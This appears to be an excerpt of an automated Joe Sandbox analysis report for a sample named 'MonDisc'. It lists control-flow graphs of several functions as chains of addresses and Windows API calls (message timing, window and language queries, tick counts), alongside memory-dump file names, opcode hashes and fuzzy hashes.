7ff62c8f7ecf-7ff62c8f7edd 768->801 801->801 802 7ff62c8f7edf-7ff62c8f7fcf GetDoubleClickTime call 7ff62c984484 * 2 801->802 810 7ff62c8f8100-7ff62c8f811b call 7ff62c984484 802->810 811 7ff62c8f8029-7ff62c8f8031 802->811 810->811 819 7ff62c8f812e-7ff62c8f81b9 call 7ff62c984484 * 4 810->819 816 7ff62c8f8033-7ff62c8f8041 811->816 816->816 818 7ff62c8f8043-7ff62c8f80f4 call 7ff62c984484 IsIconic call 7ff62c984484 * 2 816->818 818->810 818->819 846 7ff62c8f81b9 819->846 846->846
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6bff2ef37a1e8b58c398f1a0837f5b693386628ce94bc098f00c10939dc4554f
                              • Instruction ID: dc269e71354444110279dc8fec1c8eecf7636a4595e3780099b6099d5ea103cf
                              • Opcode Fuzzy Hash: 6bff2ef37a1e8b58c398f1a0837f5b693386628ce94bc098f00c10939dc4554f
                              • Instruction Fuzzy Hash: 6F825C62E289074AFF545F34AD6A2B92AD57F25370FA4463AD80DD2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F512F Relevance: 73.0, APIs: 48, Instructions: 959COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 847 7ff62c8f512f-7ff62c8f521a call 7ff62c984484 GetMessageTime 855 7ff62c8f521c-7ff62c8f522b 847->855 855->855 856 7ff62c8f522d-7ff62c8f5268 call 7ff62c984484 855->856 861 7ff62c8f526a-7ff62c8f5279 856->861 861->861 862 7ff62c8f527b-7ff62c8f5285 861->862 863 7ff62c8f5287-7ff62c8f52c6 call 7ff62c984484 * 2 862->863 870 7ff62c8f52c8-7ff62c8f52d4 GetUserDefaultLangID call 7ff62c9ee398 863->870 873 7ff62c8f52d6-7ff62c8f52eb GetSystemDefaultLangID 870->873 873->873 874 7ff62c8f52ed-7ff62c8f5361 GetParent GetDoubleClickTime * 2 call 7ff62c984484 873->874 879 7ff62c8f5364-7ff62c8f5373 874->879 879->879 880 7ff62c8f5375-7ff62c8f53ac GetWindowTextLengthW GetMessageExtraInfo call 7ff62c984484 879->880 886 7ff62c8f53af 880->886 887 7ff62c8f53b1-7ff62c8f53ff call 7ff62c984484 886->887 892 7ff62c8f5401-7ff62c8f5418 887->892 892->886 893 7ff62c8f541a-7ff62c8f544a IsIconic * 2 GetDoubleClickTime GetLastActivePopup GetMessageTime 892->893 894 7ff62c8f545d-7ff62c8f5471 call 7ff62c984484 893->894 898 7ff62c8f5473-7ff62c8f54b6 call 7ff62c984484 GetCurrentProcessId 894->898 899 7ff62c8f544c-7ff62c8f544f 894->899 904 7ff62c8f54b8-7ff62c8f54cd GetShellWindow 898->904 899->894 899->898 904->904 905 7ff62c8f54cf-7ff62c8f55cf GetTopWindow GetMessageExtraInfo call 7ff62c984484 * 2 GetParent call 7ff62c984484 * 3 904->905 927 7ff62c8f55d1-7ff62c8f55e0 905->927 927->927 928 7ff62c8f55e2-7ff62c8f55fd call 7ff62c984484 927->928 932 7ff62c8f5603-7ff62c8f561a GetTopWindow 928->932 932->932 933 7ff62c8f561c-7ff62c8f75db call 7ff62c984484 call 7ff62c9844fc call 7ff62c9844f4 call 7ff62c984484 * 2 GetLastActivePopup 932->933 950 7ff62c8f75dd-7ff62c8f75eb 933->950 950->950 951 7ff62c8f75ed-7ff62c8f75fc 950->951 952 7ff62c8f7619-7ff62c8f762c call 7ff62c984484 951->952 956 7ff62c8f75fe-7ff62c8f7602 952->956 957 7ff62c8f762e-7ff62c8f7630 952->957 956->952 956->957 958 7ff62c8f7635 957->958 959 7ff62c8f7637-7ff62c8f7645 958->959 959->959 960 7ff62c8f7647-7ff62c8f7655 959->960 960->958 961 7ff62c8f7657-7ff62c8f76a5 IsIconic call 7ff62c984484 * 2 960->961 969 7ff62c8f76a7-7ff62c8f76b5 961->969 969->969 970 7ff62c8f76b7-7ff62c8f76c6 GetMessageExtraInfo 969->970 971 7ff62c8f76e3-7ff62c8f76f9 call 7ff62c984484 970->971 975 7ff62c8f76fb-7ff62c8f77f3 call 7ff62c984484 * 3 971->975 976 7ff62c8f76c8-7ff62c8f76cc 971->976 989 7ff62c8f77f5-7ff62c8f7803 975->989 976->971 976->975 989->989 990 7ff62c8f7805-7ff62c8f7831 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 989->990 991 7ff62c8f7834-7ff62c8f787e call 7ff62c984484 990->991 996 7ff62c8f7880-7ff62c8f7973 call 7ff62c984484 * 2 GetUserDefaultLangID 991->996 1006 7ff62c8f7975-7ff62c8f7983 996->1006 1006->1006 1007 7ff62c8f7985-7ff62c8f7ba4 call 7ff62c984484 * 2 GetShellWindow AnyPopup GetCommandLineW call 7ff62c984484 * 2 GetMessageTime call 7ff62c984484 * 2 1006->1007 1031 7ff62c8f7c3c-7ff62c8f7c48 1007->1031 1032 7ff62c8f7c4e-7ff62c8f7c6a GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 1031->1032 1033 7ff62c8f7ba9-7ff62c8f7bad 1031->1033 1034 7ff62c8f7c6d-7ff62c8f7c84 GetTickCount 1032->1034 1033->1031 1033->1032 1034->1034 1035 7ff62c8f7c86-7ff62c8f7c9a GetCurrentProcessId GetTickCount IsIconic 1034->1035 1036 7ff62c8f7c9c-7ff62c8f7caa 1035->1036 1036->1036 1037 7ff62c8f7cac-7ff62c8f7cf7 GetCommandLineW GetDesktopWindow call 7ff62c984484 IsZoomed 1036->1037 1043 7ff62c8f7cf9-7ff62c8f7d07 1037->1043 1043->1043 1044 7ff62c8f7d09-7ff62c8f7ec9 call 7ff62c984484 * 2 GetLastActivePopup call 7ff62c984484 * 6 1043->1044 1077 7ff62c8f7ecf-7ff62c8f7edd 1044->1077 1077->1077 1078 7ff62c8f7edf-7ff62c8f7fcf GetDoubleClickTime call 7ff62c984484 * 2 1077->1078 1086 7ff62c8f8100-7ff62c8f811b call 7ff62c984484 1078->1086 1087 7ff62c8f8029-7ff62c8f8031 1078->1087 1086->1087 1095 7ff62c8f812e-7ff62c8f81b9 call 7ff62c984484 * 4 1086->1095 1092 7ff62c8f8033-7ff62c8f8041 1087->1092 1092->1092 1094 7ff62c8f8043-7ff62c8f80f4 call 7ff62c984484 IsIconic call 7ff62c984484 * 2 1092->1094 1094->1086 1094->1095 1122 7ff62c8f81b9 1095->1122 1122->1122
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1729a107793c4e065a05af5c08b281f8753eb9a14e7e7a0112f43c3bc5ed30ff
                              • Instruction ID: f75f8f7684c0fed5b36c5ded3087eaf59489034908deb20d6df8e625951692ff
                              • Opcode Fuzzy Hash: 1729a107793c4e065a05af5c08b281f8753eb9a14e7e7a0112f43c3bc5ed30ff
                              • Instruction Fuzzy Hash: C8825C62D289074AFF555F34AC6A2B92AD47F253B4FA4463AD80DD2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F5117 Relevance: 71.4, APIs: 47, Instructions: 863windowtimeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1123 7ff62c8f5117-7ff62c8f521a call 7ff62c984484 GetMessageTime 1131 7ff62c8f521c-7ff62c8f522b 1123->1131 1131->1131 1132 7ff62c8f522d-7ff62c8f5268 call 7ff62c984484 1131->1132 1137 7ff62c8f526a-7ff62c8f5279 1132->1137 1137->1137 1138 7ff62c8f527b-7ff62c8f5285 1137->1138 1139 7ff62c8f5287-7ff62c8f52c6 call 7ff62c984484 * 2 1138->1139 1146 7ff62c8f52c8-7ff62c8f52d4 GetUserDefaultLangID call 7ff62c9ee398 1139->1146 1149 7ff62c8f52d6-7ff62c8f52eb GetSystemDefaultLangID 1146->1149 1149->1149 1150 7ff62c8f52ed-7ff62c8f5361 GetParent GetDoubleClickTime * 2 call 7ff62c984484 1149->1150 1155 7ff62c8f5364-7ff62c8f5373 1150->1155 1155->1155 1156 7ff62c8f5375-7ff62c8f53ac GetWindowTextLengthW GetMessageExtraInfo call 7ff62c984484 1155->1156 1162 7ff62c8f53af 1156->1162 1163 7ff62c8f53b1-7ff62c8f53ff call 7ff62c984484 1162->1163 1168 7ff62c8f5401-7ff62c8f5418 1163->1168 1168->1162 1169 7ff62c8f541a-7ff62c8f544a IsIconic * 2 GetDoubleClickTime GetLastActivePopup GetMessageTime 1168->1169 1170 7ff62c8f545d-7ff62c8f5471 call 7ff62c984484 1169->1170 1174 7ff62c8f5473-7ff62c8f54b6 call 7ff62c984484 GetCurrentProcessId 1170->1174 1175 7ff62c8f544c-7ff62c8f544f 1170->1175 1180 7ff62c8f54b8-7ff62c8f54cd GetShellWindow 1174->1180 1175->1170 1175->1174 1180->1180 1181 7ff62c8f54cf-7ff62c8f55cf GetTopWindow GetMessageExtraInfo call 7ff62c984484 * 2 GetParent call 7ff62c984484 * 3 1180->1181 1203 7ff62c8f55d1-7ff62c8f55e0 1181->1203 1203->1203 1204 7ff62c8f55e2-7ff62c8f55fd call 7ff62c984484 1203->1204 1208 7ff62c8f5603-7ff62c8f561a GetTopWindow 1204->1208 1208->1208 1209 7ff62c8f561c-7ff62c8f75db call 7ff62c984484 call 7ff62c9844fc call 7ff62c9844f4 call 7ff62c984484 * 2 GetLastActivePopup 1208->1209 1226 7ff62c8f75dd-7ff62c8f75eb 1209->1226 1226->1226 1227 7ff62c8f75ed-7ff62c8f75fc 1226->1227 1228 7ff62c8f7619-7ff62c8f762c call 7ff62c984484 1227->1228 1232 7ff62c8f75fe-7ff62c8f7602 1228->1232 1233 7ff62c8f762e-7ff62c8f7630 1228->1233 1232->1228 1232->1233 1234 7ff62c8f7635 1233->1234 1235 7ff62c8f7637-7ff62c8f7645 1234->1235 1235->1235 1236 7ff62c8f7647-7ff62c8f7655 1235->1236 1236->1234 1237 7ff62c8f7657-7ff62c8f76a5 IsIconic call 7ff62c984484 * 2 1236->1237 1245 7ff62c8f76a7-7ff62c8f76b5 1237->1245 1245->1245 1246 7ff62c8f76b7-7ff62c8f76c6 GetMessageExtraInfo 1245->1246 1247 7ff62c8f76e3-7ff62c8f76f9 call 7ff62c984484 1246->1247 1251 7ff62c8f76fb-7ff62c8f77f3 call 7ff62c984484 * 3 1247->1251 1252 7ff62c8f76c8-7ff62c8f76cc 1247->1252 1265 7ff62c8f77f5-7ff62c8f7803 1251->1265 1252->1247 1252->1251 1265->1265 1266 7ff62c8f7805-7ff62c8f7831 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 1265->1266 1267 7ff62c8f7834-7ff62c8f787e call 7ff62c984484 1266->1267 1272 7ff62c8f7880-7ff62c8f7973 call 7ff62c984484 * 2 GetUserDefaultLangID 1267->1272 1282 7ff62c8f7975-7ff62c8f7983 1272->1282 1282->1282 1283 7ff62c8f7985-7ff62c8f7ba4 call 7ff62c984484 * 2 GetShellWindow AnyPopup GetCommandLineW call 7ff62c984484 * 2 GetMessageTime call 7ff62c984484 * 2 1282->1283 1307 7ff62c8f7c3c-7ff62c8f7c48 1283->1307 1308 7ff62c8f7c4e-7ff62c8f7c6a GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 1307->1308 1309 7ff62c8f7ba9-7ff62c8f7bad 1307->1309 1310 7ff62c8f7c6d-7ff62c8f7c84 GetTickCount 1308->1310 1309->1307 1309->1308 1310->1310 1311 7ff62c8f7c86-7ff62c8f7c9a GetCurrentProcessId GetTickCount IsIconic 1310->1311 1312 7ff62c8f7c9c-7ff62c8f7caa 1311->1312 1312->1312 1313 7ff62c8f7cac-7ff62c8f7cf7 GetCommandLineW GetDesktopWindow call 7ff62c984484 IsZoomed 1312->1313 1319 7ff62c8f7cf9-7ff62c8f7d07 1313->1319 1319->1319 1320 7ff62c8f7d09-7ff62c8f7ec9 call 7ff62c984484 * 2 GetLastActivePopup call 7ff62c984484 * 6 1319->1320 1353 7ff62c8f7ecf-7ff62c8f7edd 1320->1353 1353->1353 1354 7ff62c8f7edf-7ff62c8f7fcf GetDoubleClickTime call 7ff62c984484 * 2 1353->1354 1362 7ff62c8f8100-7ff62c8f811b call 7ff62c984484 1354->1362 1363 7ff62c8f8029-7ff62c8f8031 1354->1363 1362->1363 1371 7ff62c8f812e-7ff62c8f81b9 call 7ff62c984484 * 4 1362->1371 1368 7ff62c8f8033-7ff62c8f8041 1363->1368 1368->1368 1370 7ff62c8f8043-7ff62c8f80f4 call 7ff62c984484 IsIconic call 7ff62c984484 * 2 1368->1370 1370->1362 1370->1371 1398 7ff62c8f81b9 1371->1398 1398->1398
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: MessageTime
                              • String ID:
                              • API String ID: 761539514-0
                              • Opcode ID: 8b4aad55dd11f83bfe675c7d283c766344b9de2021c3024b51f32849b0f369df
                              • Instruction ID: a2896c53d6ac9807c43ec495a312f5eb81710c50be4b1ad746ef493664e697a5
                              • Opcode Fuzzy Hash: 8b4aad55dd11f83bfe675c7d283c766344b9de2021c3024b51f32849b0f369df
                              • Instruction Fuzzy Hash: 42725E62D2C9074AFF555B34AC6A2B92AD57F25370FA4463AD80ED3297DF3CB1498203
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F8EB4 Relevance: 68.3, APIs: 45, Instructions: 790windowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1399 7ff62c8f8eb4-7ff62c8f8ecd GetMessageExtraInfo call 7ff62c984484 1404 7ff62c8f8ecf-7ff62c8f8ed4 1399->1404 1405 7ff62c8f8ed6-7ff62c8f8ed8 1399->1405 1404->1405 1406 7ff62c8f8f2f-7ff62c8f8f45 call 7ff62c984484 1405->1406 1407 7ff62c8f8eda 1405->1407 1414 7ff62c8f8fc5 1406->1414 1415 7ff62c8f8f47-7ff62c8f8f4f call 7ff62c984484 1406->1415 1408 7ff62c8f8edd 1407->1408 1410 7ff62c8f8ee0-7ff62c8f8ef6 GetLargePageMinimum 1408->1410 1410->1410 1412 7ff62c8f8ef8-7ff62c8f8f09 1410->1412 1412->1408 1416 7ff62c8f8f0b-7ff62c8f8f19 call 7ff62c984484 1412->1416 1417 7ff62c8f8fc8-7ff62c8f8fd0 call 7ff62c984484 1414->1417 1424 7ff62c8f8f51-7ff62c8f8f56 1415->1424 1425 7ff62c8f8f58-7ff62c8f8f76 call 7ff62c984484 1415->1425 1426 7ff62c8f8f22-7ff62c8f8f2a 1416->1426 1427 7ff62c8f8f1b-7ff62c8f8f20 1416->1427 1428 7ff62c8f8fd2-7ff62c8f8fd7 1417->1428 1429 7ff62c8f8fd9-7ff62c8f8fdc 1417->1429 1424->1425 1440 7ff62c8f8f7f-7ff62c8f8fae call 7ff62c984484 1425->1440 1441 7ff62c8f8f78-7ff62c8f8f7d 1425->1441 1431 7ff62c8f8fbf 1426->1431 1427->1426 1428->1429 1432 7ff62c8f8fde-7ff62c8f8fe6 call 7ff62c984484 1429->1432 1433 7ff62c8f8ffd-7ff62c8f900e 1429->1433 1431->1414 1442 7ff62c8f8fef-7ff62c8f8ff7 1432->1442 1443 7ff62c8f8fe8-7ff62c8f8fed 1432->1443 1433->1417 1436 7ff62c8f9010-7ff62c8f9020 GetParent IsIconic 1433->1436 1439 7ff62c8f9023-7ff62c8f902b call 7ff62c984484 1436->1439 1449 7ff62c8f9034-7ff62c8f903c call 7ff62c984484 1439->1449 1450 7ff62c8f902d-7ff62c8f9032 1439->1450 1452 7ff62c8f8fb0-7ff62c8f8fb5 1440->1452 1453 7ff62c8f8fb7-7ff62c8f8fbc 1440->1453 1441->1440 1442->1433 1443->1442 1455 7ff62c8f9045-7ff62c8f9063 1449->1455 1456 7ff62c8f903e-7ff62c8f9043 1449->1456 1450->1449 1452->1453 1453->1431 1455->1439 1457 7ff62c8f9065-7ff62c8f906b GetMessageExtraInfo 1455->1457 1456->1455 1458 7ff62c8f906d-7ff62c8f907b 1457->1458 1458->1458 1459 7ff62c8f907d 1458->1459 1460 7ff62c8f9080-7ff62c8f9095 call 7ff62c984484 1459->1460 1463 7ff62c8f909e-7ff62c8f90ae 1460->1463 1464 7ff62c8f9097-7ff62c8f909c 1460->1464 1465 7ff62c8f90b0-7ff62c8f90b4 1463->1465 1466 7ff62c8f90b6-7ff62c8f90b8 GetWindowTextLengthW 1463->1466 1464->1463 1465->1460 1465->1466 1467 7ff62c8f90be-7ff62c8f90cf 1466->1467 1467->1467 1468 7ff62c8f90d1-7ff62c8f90df call 7ff62c984484 1467->1468 1471 7ff62c8f90e1-7ff62c8f90e6 1468->1471 1472 7ff62c8f90e8-7ff62c8f90eb 1468->1472 1471->1472 1473 7ff62c8f910e-7ff62c8f9116 GetLastActivePopup 1472->1473 1474 7ff62c8f90ed-7ff62c8f90f5 call 7ff62c984484 1472->1474 1476 7ff62c8f9120-7ff62c8f9128 1473->1476 1479 7ff62c8f90fe-7ff62c8f910c 1474->1479 1480 7ff62c8f90f7-7ff62c8f90fc 1474->1480 1478 7ff62c8f912b-7ff62c8f9140 call 7ff62c984484 1476->1478 1483 7ff62c8f9142-7ff62c8f9147 1478->1483 1484 7ff62c8f9149-7ff62c8f9155 1478->1484 1479->1476 1480->1479 1483->1484 1485 7ff62c8f915f-7ff62c8f9165 AnyPopup 1484->1485 1486 7ff62c8f9157 1484->1486 1488 7ff62c8f9167-7ff62c8f9175 1485->1488 1486->1485 1487 7ff62c8f9159-7ff62c8f915d 1486->1487 1487->1478 1487->1485 1488->1488 1489 7ff62c8f9177 1488->1489 1490 7ff62c8f917a-7ff62c8f918f call 7ff62c984484 1489->1490 1493 7ff62c8f9191-7ff62c8f9196 1490->1493 1494 7ff62c8f9198-7ff62c8f919b 1490->1494 1493->1494 1495 7ff62c8f91a3-7ff62c8f91da GetWindowTextLengthW GetUserDefaultLangID call 7ff62c904f70 1494->1495 1496 7ff62c8f919d-7ff62c8f91a1 1494->1496 1499 7ff62c8f91e0-7ff62c8f91ec call 7ff62c8fce80 1495->1499 1500 7ff62c8fa5f6-7ff62c8fa615 call 7ff62c8fb610 1495->1500 1496->1490 1496->1495 1505 7ff62c8f91f1-7ff62c8f91ff 1499->1505 1505->1505 1506 7ff62c8f9201-7ff62c8f93f5 GetForegroundWindow call 7ff62c984484 GetDoubleClickTime call 7ff62c984484 * 3 GetUserDefaultLangID call 7ff62c984484 * 2 GetLargePageMinimum call 7ff62c984484 GetModuleHandleW 1505->1506 1536 7ff62c8f93f7-7ff62c8f9405 1506->1536 1536->1536 1537 7ff62c8f9407-7ff62c8f9418 1536->1537 1537->1537 1538 7ff62c8f941a 1537->1538 1539 7ff62c8f941d-7ff62c8f9436 IsZoomed 1538->1539 1539->1539 1540 7ff62c8f9438 1539->1540 1541 7ff62c8f943a-7ff62c8f9448 1540->1541 1541->1541 1542 7ff62c8f944a-7ff62c8f96ba call 7ff62c984484 * 4 GetWindowTextLengthW call 7ff62c984484 GetDesktopWindow GetTopWindow GetCommandLineW GetTopWindow GetMessageTime call 7ff62c984484 * 2 GetSystemDefaultLangID call 7ff62c984484 * 2 1541->1542 1576 7ff62c8f96bc-7ff62c8f96ca 1542->1576 1576->1576 1577 7ff62c8f96cc-7ff62c8f96e7 call 7ff62c984484 1576->1577 1581 7ff62c8f9712-7ff62c8f9736 AnyPopup call 7ff62c984484 1577->1581 1582 7ff62c8f9779-7ff62c8f979c call 7ff62c984484 1577->1582 1581->1582 1589 7ff62c8f980f-7ff62c8f9877 call 7ff62c984484 * 2 1581->1589 1582->1581 1582->1589 1598 7ff62c8f9879-7ff62c8f9887 1589->1598 1598->1598 1599 7ff62c8f9889-7ff62c8f9a82 call 7ff62c984484 * 6 GetCurrentProcessId GetUserDefaultLangID GetSystemDefaultLangID call 7ff62c984484 * 2 GetTopWindow 1598->1599 1631 7ff62c8f9a85-7ff62c8f9a9c GetSystemDefaultLangID 1599->1631 1631->1631 1632 7ff62c8f9a9e-7ff62c8f9c00 call 7ff62c984484 * 3 1631->1632 1645 7ff62c8f9c05-7ff62c8f9c13 1632->1645 1645->1645 1646 7ff62c8f9c15 1645->1646 1647 7ff62c8f9c17 1646->1647 1648 7ff62c8f9c19-7ff62c8f9c27 1647->1648 1648->1648 1649 7ff62c8f9c29-7ff62c8f9c37 1648->1649 1649->1647 1650 7ff62c8f9c39 1649->1650 1651 7ff62c8f9c3b-7ff62c8f9c53 1650->1651 1651->1651 1652 7ff62c8f9c55-7ff62c8f9c6c GetMessageTime GetMessageExtraInfo IsZoomed 1651->1652 1653 7ff62c8f9c71-7ff62c8f9cbb call 7ff62c984484 * 2 1652->1653 1661 7ff62c8f9cbd-7ff62c8f9cfd GetForegroundWindow GetDoubleClickTime GetUserDefaultLangID call 7ff62c984484 1653->1661 1666 7ff62c8f9d00-7ff62c8f9d5e call 7ff62c984484 GetLargePageMinimum 1661->1666 1671 7ff62c8f9d60-7ff62c8f9fef GetShellWindow call 7ff62c984484 * 7 GetCurrentProcessId call 7ff62c984484 GetCommandLineW GetModuleHandleW call 7ff62c984484 GetCommandLineW call 7ff62c984484 * 2 1666->1671 1713 7ff62c8f9ff4 1671->1713 1714 7ff62c8f9ff7-7ff62c8fa005 1713->1714 1714->1714 1715 7ff62c8fa007-7ff62c8fa015 1714->1715 1715->1713 1716 7ff62c8fa017-7ff62c8fa069 call 7ff62c984484 call 7ff62c8fdc20 call 7ff62c8fe2b0 1715->1716 1724 7ff62c8fa06e 1716->1724 1725 7ff62c8fa070-7ff62c8fa07e 1724->1725 1725->1725 1726 7ff62c8fa080-7ff62c8fa091 1725->1726 1726->1724 1727 7ff62c8fa093-7ff62c8fa172 call 7ff62c984484 * 4 1726->1727 1743 7ff62c8fa174-7ff62c8fa182 1727->1743 1743->1743 1744 7ff62c8fa184 1743->1744 1745 7ff62c8fa186-7ff62c8fa19a 1744->1745 1745->1745 1746 7ff62c8fa19c-7ff62c8fa1cb call 7ff62c984484 GetCommandLineW 1745->1746 1751 7ff62c8fa1d0-7ff62c8fa1de 1746->1751 1751->1751 1752 7ff62c8fa1e0-7ff62c8fa33a call 7ff62c984484 GetCurrentProcessId GetLargePageMinimum GetMessageExtraInfo call 7ff62c984484 * 2 GetWindowTextLengthW call 7ff62c984484 * 2 1751->1752 1752->1500
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window$ExtraInfoLengthMessageText$DefaultForegroundIconicLangLargeMinimumPageParentPopupUser
                              • String ID:
                              • API String ID: 2764942508-0
                              • Opcode ID: ebf465c328883eba75dfd2c0a98478ad7369ff7afb75a212376519344fbb4255
                              • Instruction ID: bd92dc210b8b7842c86711e3d694decafa4df4de14a90d28e3987d5445ac83f2
                              • Opcode Fuzzy Hash: ebf465c328883eba75dfd2c0a98478ad7369ff7afb75a212376519344fbb4255
                              • Instruction Fuzzy Hash: 0C623E62D2C9164AFF516B34AC652B92AD57F253B0F94863AD80DD22A7EF3CB085C503
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F5101 Relevance: 65.1, APIs: 43, Instructions: 623COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1770 7ff62c8f5101-7ff62c8f521a call 7ff62c984484 GetMessageTime 1778 7ff62c8f521c-7ff62c8f522b 1770->1778 1778->1778 1779 7ff62c8f522d-7ff62c8f5268 call 7ff62c984484 1778->1779 1784 7ff62c8f526a-7ff62c8f5279 1779->1784 1784->1784 1785 7ff62c8f527b-7ff62c8f5285 1784->1785 1786 7ff62c8f5287-7ff62c8f52c6 call 7ff62c984484 * 2 1785->1786 1793 7ff62c8f52c8-7ff62c8f52d4 GetUserDefaultLangID call 7ff62c9ee398 1786->1793 1796 7ff62c8f52d6-7ff62c8f52eb GetSystemDefaultLangID 1793->1796 1796->1796 1797 7ff62c8f52ed-7ff62c8f5361 GetParent GetDoubleClickTime * 2 call 7ff62c984484 1796->1797 1802 7ff62c8f5364-7ff62c8f5373 1797->1802 1802->1802 1803 7ff62c8f5375-7ff62c8f53ac GetWindowTextLengthW GetMessageExtraInfo call 7ff62c984484 1802->1803 1809 7ff62c8f53af 1803->1809 1810 7ff62c8f53b1-7ff62c8f53ff call 7ff62c984484 1809->1810 1815 7ff62c8f5401-7ff62c8f5418 1810->1815 1815->1809 1816 7ff62c8f541a-7ff62c8f544a IsIconic * 2 GetDoubleClickTime GetLastActivePopup GetMessageTime 1815->1816 1817 7ff62c8f545d-7ff62c8f5471 call 7ff62c984484 1816->1817 1821 7ff62c8f5473-7ff62c8f54b6 call 